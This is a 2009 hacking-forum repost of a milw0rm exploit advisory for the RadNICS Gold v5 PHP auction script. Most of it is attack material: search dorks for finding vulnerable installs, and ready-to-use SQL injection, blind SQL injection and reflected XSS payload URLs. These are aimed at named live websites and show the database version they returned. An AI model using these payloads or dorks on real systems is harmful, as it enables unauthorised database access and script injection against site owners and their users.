Multi Ethnic Hacking Group


    RadNICS Gold v5 Multiple Remote Vulnerabilities

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    RadNICS Gold v5 Multiple Remote Vulnerabilities

    Post by Foxi on Thu Jul 23, 2009 4:25 am

    Code:
    ###########################################################################
    #-----------------------------I AM MUSLIM !!------------------------------#
    ###########################################################################

    ==============================================================================
                          _      _      _          _      _  _
                        / \    | |    | |        / \    | | | |
                        / _ \  | |    | |      / _ \  | |_| |
                      / ___ \  | |___  | |___  / ___ \  |  _  |
      IN THE NAME OF /_/  \_\ |_____| |_____| /_/  \_\ |_| |_|
                                                               

    ==============================================================================
            [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
    ==============================================================================
            [»] RadNICS Gold v5 Multiple Remote Vulnerabilities
    ==============================================================================

       [»] script:            [ RadNICS Gold v5 ]
       [»] Language:          [ PHP ]
            [»] Download:          [ http://www.radscripts.com/php-scripts/domain_name_software_auctions/gold_features_admin.php  ]
       [»] Founder:            [ Moudi <m0udi@9.cn> ]
            [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
            [»] Team:              [ EvilWay ]
            [»] Dork:              [ Content Copyright © 2007 RadNics Gold ]
            [»] Dork2:              [ Powered by: RadNICS Gold v5 ]
            [»] Price:              [ $199 ]
            [»] Site :              [ https://security-shell.ws/forum.php ]

    ###########################################################################

    ===[ Exploit + LIVE : SQL INJECTION vulnerability ]===   
       
    [»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL]   

    [»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
    [»] http://dottvauction.com/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
        RESULT : 5.0.67-community

    ===[ Exploit + LIVE : BLIND SQL vulnerability ]===

    [»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND]

    [»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
        http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
        SO MYSQL: V5

    ===[ Exploit XSS + LIVE : vulnerability ]===

    [»] http://www.site.com/patch/index.php?a=ulist&mode=9&order=[XSS]&cat=1
    [»] http://www.site.com/patch/index.php?a=view_forum&fid=[XSS]&admin=0

    [»] http://www.radnics.com/v5/052107/index.php?a=ulist&mode=9&order=1>'><script %0A%0D>alert(640795682719)%3B</script>&cat=1
    [»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1>'><script %0A%0D>alert(664745745195)%3B</script>&admin=0


    Author: Moudi

    ###########################################################################

    # milw0rm.com [2009-07-17]


      Current date/time is Fri Mar 24, 2017 5:58 pm